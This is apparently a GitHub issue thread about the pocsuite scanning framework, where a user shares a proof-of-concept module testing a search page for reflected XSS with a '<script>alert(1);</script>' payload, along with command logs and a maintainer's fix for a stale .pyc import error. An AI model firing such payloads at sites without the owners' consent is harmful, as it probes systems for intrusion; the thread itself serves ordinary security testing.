Comments (4)
@tylerdurden2010 Please paste the error details here, and I'll try to fix it.
from pocsuite.
Thanks nixawk, I guess I just copied some old-fashioned example code, which caused these issues.
#Cross Site Scripting
# coding: utf-8
import re
import time
import urlparse  # Python 2 module

# pocsuite.net is the import the log below reports as missing ("No module named net")
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '2'  # VUL ID
    version = '1'  # defaults to 1
    author = 'w'  # PoC author's name
    vulDate = '2014-10-16'  # date the vulnerability was disclosed; use today's date if unknown
    createDate = '2014-10-16'  # date the PoC was written
    updateDate = '2014-10-16'  # date the PoC was last updated; defaults to the creation date
    references = [
        'https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html']  # source of the vulnerability report; not needed for a 0-day
    name = 'SearchXSS'  # PoC name
    appPowerLink = 'https://www.drupal.org/'  # vendor home page
    appName = 'cms'  # name of the affected application
    appVersion = '7.x'  # affected versions
    vulType = 'Cross Site Scripting'  # vulnerability type; see the vulnerability type reference table
    desc = '''
    pure reflected xss
    '''  # brief description of the vulnerability
    samples = []  # test samples: sites the PoC was successfully tested against (optional)

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        vulurl = urlparse.urljoin(self.url, 'search.php?keywords=')
        payload = "<script>alert(1);</script>"
        # Raw string so the regex escapes reach the re module unchanged
        Repayload = r"\<script\>alert\(1\);\<\/script\>"
        a = re.compile(Repayload)
        vulurl = vulurl + payload
        resp = req.get(vulurl)
        # The check passes only if the payload comes back unescaped
        reResult = re.search(a, resp.content)
        if reResult:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)
python pocsuite.py -r ./pocsuite/tests/SearchXSS.pyc -u chttp://192.168.33.10/cms/ --verify --report /tmp/report.html --mongodb 127.0.0.1:27017 --cookie "a=t"
,--. ,--.
,---. ,---. ,---.,---.,--.,--`--,-' '-.,---. {2.0.4.1-nongit-20160926}
| .-. | .-. | .--( .-'| || ,--'-. .-| .-. :
| '-' ' '-' \ `--.-' `' '' | | | | \ --.
| |-' `---' `---`----' `----'`--' `--' `----'
`--' http://pocsuite.org
[!] legal disclaimer: Usage of pocsuite for attacking targets without prior mutual consent is illegal.
[*] starting at 15:46:47
[15:46:47] [DEBUG] setting the HTTP Cookie header
[15:46:47] [-] SearchXSS register failed "No module named net"
[*] shutting down at 15:46:47
from pocsuite.
@tylerdurden2010 Please review the poc format, e.g. dlink_command_php_exec_noauth. I've tested your module, and it works well.
ks-pocsuite [master] ->> python pocsuite.py -r /Users/Open-Security/Share/pocsuite-test/SearchXSS.py -u http://192.168.1.1/cms/ --verify --cookie "a=t"
,--. ,--.
,---. ,---. ,---.,---.,--.,--`--,-' '-.,---. {2.0.4.1-e36c021}
| .-. | .-. | .--( .-'| || ,--'-. .-| .-. :
| '-' ' '-' \ `--.-' `' '' | | | | \ --.
| |-' `---' `---`----' `----'`--' `--' `----'
`--' http://pocsuite.org
[!] legal disclaimer: Usage of pocsuite for attacking targets without prior mutual consent is illegal.
[*] starting at 02:15:19
[02:15:19] [DEBUG] setting the HTTP Cookie header
[02:15:19] [*] checking SearchXSS
[02:15:19] [*] poc:'SearchXSS' target:'http://192.168.1.1/cms/'
[02:15:19] [-] poc-2 'SearchXSS' failed.
+-------------------------+-----------+--------+-----------+---------+----------+
| target-url | poc-name | poc-id | component | version | status |
+-------------------------+-----------+--------+-----------+---------+----------+
| http://192.168.1.1/cms/ | SearchXSS | 2 | cms | 7.x | Error: n |
+-------------------------+-----------+--------+-----------+---------+----------+
success : 0 / 1
[*] shutting down at 02:15:19
Please delete SearchXSS.pyc and try it again. If no error, the issue will be closed.
from pocsuite.
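The advice above to delete SearchXSS.pyc generalises to a check for compiled bytecode that no longer matches, or no longer has, its source. This is an added example, not code from pocsuite or from the commenters; it assumes the Python 2 layout in which X.pyc sits beside X.py, and `recorded_mtime`, `audit_pyc` and `demo` are names invented here, with `demo` building a constructed sample tree.

```python
import os
import struct
import tempfile

PEP552_MAGIC = 3392  # first CPython magic whose header has a flags word (3.7)

def recorded_mtime(header):
    """Source mtime stored in a .pyc header, or None if it cannot be read."""
    if len(header) < 12 or header[2:4] != b"\r\n":
        return None
    magic = struct.unpack("<H", header[:2])[0]
    if PEP552_MAGIC <= magic < 20000:  # 3.7+: magic, flags, mtime, size
        flags, mtime = struct.unpack("<II", header[4:12])
        return None if flags & 1 else mtime  # hash-based pyc has no mtime
    return struct.unpack("<I", header[4:8])[0]  # Python 2 and 3.0-3.6

def audit_pyc(root):
    """Classify each X.pyc against the X.py expected beside it."""
    findings = []
    for dirpath, dirs, files in os.walk(root):
        dirs[:] = sorted(d for d in dirs if d != "__pycache__")
        for name in sorted(f for f in files if f.endswith(".pyc")):
            pyc = os.path.join(dirpath, name)
            src = pyc[:-1]
            with open(pyc, "rb") as fh:
                mtime = recorded_mtime(fh.read(12))
            if not os.path.exists(src):
                verdict = "orphan"   # bytecode with no source to review
            elif mtime is None:
                verdict = "unknown"
            elif mtime != int(os.stat(src).st_mtime) & 0xFFFFFFFF:
                verdict = "stale"    # source changed after compilation
            else:
                verdict = "fresh"
            findings.append((os.path.relpath(pyc, root), verdict))
    return findings

def demo():
    """Constructed sample tree: one fresh, one stale and one orphan .pyc."""
    py27 = struct.pack("<H", 62211) + b"\r\n"  # CPython 2.7 magic
    root = tempfile.mkdtemp()
    for name, src_mtime, pyc_mtime in [("a", 1000, 1000), ("b", 2000, 1500), ("c", None, 1500)]:
        if src_mtime is not None:
            path = os.path.join(root, name + ".py")
            open(path, "w").close()
            os.utime(path, (src_mtime, src_mtime))
        with open(os.path.join(root, name + ".pyc"), "wb") as fh:
            fh.write(py27 + struct.pack("<I", pyc_mtime) + b"\0" * 4)  # padding stands in for code
    return audit_pyc(root)
```

Running `audit_pyc` over the directory passed to `-r` before loading PoCs shows which `.pyc` files would be executed without a matching, reviewable source.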
@tylerdurden2010 The issue is closed. If you have problems, please reopen it.
from pocsuite.